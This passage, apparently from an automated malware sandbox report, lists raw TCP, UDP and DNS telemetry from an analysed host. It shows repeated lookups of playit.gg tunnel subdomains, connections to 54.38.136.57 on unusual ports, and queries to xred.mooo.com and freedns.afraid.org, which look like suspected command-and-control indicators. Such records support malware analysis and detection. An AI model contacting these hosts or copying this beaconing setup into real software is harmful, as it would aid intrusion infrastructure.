                                                  Jan 26, 2022 02:40:43.638569117 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.640846968 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.640923977 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.641130924 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.642049074 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.642107010 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.682384968 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.682523966 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.683043003 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.683057070 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.689419985 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.689444065 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.691965103 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.692509890 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.692534924 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.692544937 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.696571112 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.696597099 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.894721031 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.894834995 CET44349781142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.894889116 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.894912004 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.925087929 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.925307989 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.925389051 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.925538063 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:44.087779999 CET4978248129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:44.126846075 CET481294978254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:44.127511978 CET4978248129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:44.127594948 CET4978248129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:44.166464090 CET481294978254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:44.180835962 CET481294978254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:45.259968042 CET4978353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:45.299190044 CET538114978354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:45.299659967 CET4978353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:45.303270102 CET4978353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:45.342216015 CET538114978354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:45.346260071 CET4978353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:45.353024960 CET538114978354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:45.385160923 CET538114978354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.404068947 CET4978448129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.442934990 CET481294978454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.443078041 CET4978448129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.443547010 CET4978448129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.482191086 CET481294978454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.496218920 CET481294978454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.526827097 CET4978553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.565207958 CET538114978554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.565371990 CET4978553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.565803051 CET4978553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:49.604188919 CET538114978554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:49.617434978 CET538114978554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:53.794770956 CET4978653811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:53.832101107 CET538114978654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:53.833930016 CET4978653811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:53.833969116 CET4978653811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:53.871345043 CET538114978654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:53.885462999 CET538114978654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:54.616602898 CET4978748129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:54.656188965 CET481294978754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:54.656364918 CET4978748129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:54.656883955 CET4978748129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:54.696202040 CET481294978754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:54.710160017 CET481294978754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:57.243987083 CET804976869.42.215.252192.168.2.3
                                                  Jan 26, 2022 02:40:57.244071960 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:40:59.770898104 CET4979148129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:59.809400082 CET481294979154.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:59.809815884 CET4979148129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:59.810301065 CET4979148129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:59.848609924 CET481294979154.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:59.863280058 CET481294979154.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:04.935381889 CET497988808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:04.975810051 CET88084979854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:05.675482988 CET497988808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:05.714715958 CET88084979854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:06.378643990 CET497988808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:06.418020964 CET88084979854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:12.049057007 CET804976869.42.215.252192.168.2.3
                                                  Jan 26, 2022 02:41:12.049118996 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:41:13.620066881 CET4980453811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:13.657174110 CET538114980454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:13.657346964 CET4980453811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:13.666121960 CET4980453811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:13.703188896 CET538114980454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:13.708363056 CET538114980454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:17.911498070 CET4981253811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:17.948208094 CET538114981254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:17.948323965 CET4981253811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:17.949070930 CET4981253811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:17.986234903 CET538114981254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:17.986386061 CET4981253811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:18.003242970 CET538114981254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:18.023262978 CET538114981254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:22.386420012 CET4982953811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:22.424774885 CET538114982954.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:22.424907923 CET4982953811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:22.425719976 CET4982953811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:22.463989019 CET538114982954.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:22.477185011 CET538114982954.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:24.416754007 CET498328808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:24.455019951 CET88084983254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:25.067615986 CET498328808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:25.105802059 CET88084983254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:25.770844936 CET498328808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:25.809134960 CET88084983254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:33.347507000 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:41:33.347816944 CET49781443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:41:33.347876072 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:41:36.889070034 CET4984648129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:36.927077055 CET481294984654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:36.927205086 CET4984648129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:36.927748919 CET4984648129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:36.965722084 CET481294984654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:36.980101109 CET481294984654.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:42.717411995 CET4984853811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:42.756843090 CET538114984854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:42.756947994 CET4984853811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:42.810355902 CET538114984854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:42.813888073 CET4984853811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:42.814547062 CET4984853811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:42.853730917 CET538114984854.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:47.034209013 CET4985353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:47.074225903 CET538114985354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:47.074413061 CET4985353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:47.074661970 CET4985353811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:47.113735914 CET538114985354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:47.127094984 CET538114985354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:48.043893099 CET498548808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:48.082422018 CET88084985454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:48.584870100 CET498548808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:48.623542070 CET88084985454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:49.131814957 CET498548808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:49.170486927 CET88084985454.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:51.150990963 CET4985553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:51.190006971 CET538114985554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:51.190118074 CET4985553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:51.190383911 CET4985553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:41:51.229233027 CET538114985554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:41:51.347069025 CET538114985554.38.136.57192.168.2.3

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 26, 2022 02:40:06.257282972 CET6402153192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:06.367955923 CET53640218.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:15.149310112 CET6078453192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:15.250360966 CET53607848.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:17.865683079 CET5114353192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:17.975477934 CET53511438.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:20.763519049 CET5902653192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:20.866235971 CET53590268.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:25.355871916 CET4957253192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:25.374995947 CET53495728.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:31.133385897 CET5213053192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:31.250781059 CET53521308.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:37.507339954 CET5652753192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:37.615461111 CET53565278.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:40.671993017 CET4955953192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:40.699500084 CET53495598.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:41.326347113 CET5265053192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:41.345874071 CET53526508.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:41.546551943 CET6329753192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:41.565371037 CET53632978.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:43.977015972 CET5361553192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:44.085745096 CET53536158.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:45.236999989 CET5072853192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:45.256189108 CET53507288.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:49.288878918 CET5377753192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:49.398410082 CET53537778.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:49.421572924 CET5710653192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:49.523896933 CET53571068.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:53.687092066 CET6035253192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:53.792155981 CET53603528.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:54.512151957 CET5677353192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:54.614680052 CET53567738.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:40:59.748697996 CET6098253192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:40:59.767992973 CET53609828.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:04.912168980 CET6436753192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:04.932037115 CET53643678.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:13.503853083 CET5058553192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:13.523139000 CET53505858.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:17.889431000 CET4925053192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:17.909354925 CET53492508.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:22.367238998 CET6511053192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:22.384677887 CET53651108.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:24.376039982 CET6112053192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:24.393465042 CET53611208.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:36.859237909 CET5670653192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:36.878462076 CET53567068.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:42.306711912 CET5356953192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:42.420746088 CET53535698.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:46.931000948 CET6285553192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:47.032968044 CET53628558.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:48.023952961 CET5104653192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:48.043034077 CET53510468.8.8.8192.168.2.3
                                                  Jan 26, 2022 02:41:51.133140087 CET6550153192.168.2.38.8.8.8
                                                  Jan 26, 2022 02:41:51.150513887 CET53655018.8.8.8192.168.2.3

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Jan 26, 2022 02:40:06.257282972 CET192.168.2.38.8.8.80x7501Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:15.149310112 CET192.168.2.38.8.8.80x7c84Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:17.865683079 CET192.168.2.38.8.8.80x6f61Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:20.763519049 CET192.168.2.38.8.8.80x31d5Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:25.355871916 CET192.168.2.38.8.8.80xc927Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:31.133385897 CET192.168.2.38.8.8.80x4285Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:37.507339954 CET192.168.2.38.8.8.80x93b6Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:40.671993017 CET192.168.2.38.8.8.80x985eStandard query (0)docs.google.comA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:41.326347113 CET192.168.2.38.8.8.80xfa1bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:41.546551943 CET192.168.2.38.8.8.80xb07aStandard query (0)freedns.afraid.orgA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:43.977015972 CET192.168.2.38.8.8.80xa0d2Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:45.236999989 CET192.168.2.38.8.8.80x2fa6Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:49.288878918 CET192.168.2.38.8.8.80xc17Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:49.421572924 CET192.168.2.38.8.8.80xd3e5Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:53.687092066 CET192.168.2.38.8.8.80x5937Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:54.512151957 CET192.168.2.38.8.8.80x435bStandard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:59.748697996 CET192.168.2.38.8.8.80x35fdStandard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:04.912168980 CET192.168.2.38.8.8.80xf014Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:13.503853083 CET192.168.2.38.8.8.80xb176Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:17.889431000 CET192.168.2.38.8.8.80x8af5Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:22.367238998 CET192.168.2.38.8.8.80xa89Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:24.376039982 CET192.168.2.38.8.8.80xc3f9Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:36.859237909 CET192.168.2.38.8.8.80xf8beStandard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:42.306711912 CET192.168.2.38.8.8.80x35b1Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:46.931000948 CET192.168.2.38.8.8.80xec9aStandard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:48.023952961 CET192.168.2.38.8.8.80x4ed3Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:51.133140087 CET192.168.2.38.8.8.80xa6c6Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Jan 26, 2022 02:40:06.367955923 CET8.8.8.8192.168.2.30x7501No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:06.367955923 CET8.8.8.8192.168.2.30x7501No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:15.250360966 CET8.8.8.8192.168.2.30x7c84No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:15.250360966 CET8.8.8.8192.168.2.30x7c84No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:17.975477934 CET8.8.8.8192.168.2.30x6f61No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:17.975477934 CET8.8.8.8192.168.2.30x6f61No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:20.866235971 CET8.8.8.8192.168.2.30x31d5No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:20.866235971 CET8.8.8.8192.168.2.30x31d5No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:25.374995947 CET8.8.8.8192.168.2.30xc927No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:25.374995947 CET8.8.8.8192.168.2.30xc927No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:31.250781059 CET8.8.8.8192.168.2.30x4285No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:31.250781059 CET8.8.8.8192.168.2.30x4285No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:37.615461111 CET8.8.8.8192.168.2.30x93b6No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:37.615461111 CET8.8.8.8192.168.2.30x93b6No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:40.699500084 CET8.8.8.8192.168.2.30x985eNo error (0)docs.google.com142.250.186.46A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:41.345874071 CET8.8.8.8192.168.2.30xfa1bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:41.565371037 CET8.8.8.8192.168.2.30xb07aNo error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:44.085745096 CET8.8.8.8192.168.2.30xa0d2No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:44.085745096 CET8.8.8.8192.168.2.30xa0d2No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:45.256189108 CET8.8.8.8192.168.2.30x2fa6No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:45.256189108 CET8.8.8.8192.168.2.30x2fa6No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:49.398410082 CET8.8.8.8192.168.2.30xc17No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:49.398410082 CET8.8.8.8192.168.2.30xc17No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:49.523896933 CET8.8.8.8192.168.2.30xd3e5No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:49.523896933 CET8.8.8.8192.168.2.30xd3e5No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:53.792155981 CET8.8.8.8192.168.2.30x5937No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:53.792155981 CET8.8.8.8192.168.2.30x5937No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:54.614680052 CET8.8.8.8192.168.2.30x435bNo error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:54.614680052 CET8.8.8.8192.168.2.30x435bNo error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:40:59.767992973 CET8.8.8.8192.168.2.30x35fdNo error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:40:59.767992973 CET8.8.8.8192.168.2.30x35fdNo error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:04.932037115 CET8.8.8.8192.168.2.30xf014No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:41:04.932037115 CET8.8.8.8192.168.2.30xf014No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:13.523139000 CET8.8.8.8192.168.2.30xb176No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:41:13.523139000 CET8.8.8.8192.168.2.30xb176No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:17.909354925 CET8.8.8.8192.168.2.30x8af5No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:41:17.909354925 CET8.8.8.8192.168.2.30x8af5No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:22.384677887 CET8.8.8.8192.168.2.30xa89No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:41:22.384677887 CET8.8.8.8192.168.2.30xa89No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:24.393465042 CET8.8.8.8192.168.2.30xc3f9No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:41:24.393465042 CET8.8.8.8192.168.2.30xc3f9No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:36.878462076 CET8.8.8.8192.168.2.30xf8beNo error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:41:36.878462076 CET8.8.8.8192.168.2.30xf8beNo error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:42.420746088 CET8.8.8.8192.168.2.30x35b1No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:41:42.420746088 CET8.8.8.8192.168.2.30x35b1No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:47.032968044 CET8.8.8.8192.168.2.30xec9aNo error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:41:47.032968044 CET8.8.8.8192.168.2.30xec9aNo error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:48.043034077 CET8.8.8.8192.168.2.30x4ed3No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
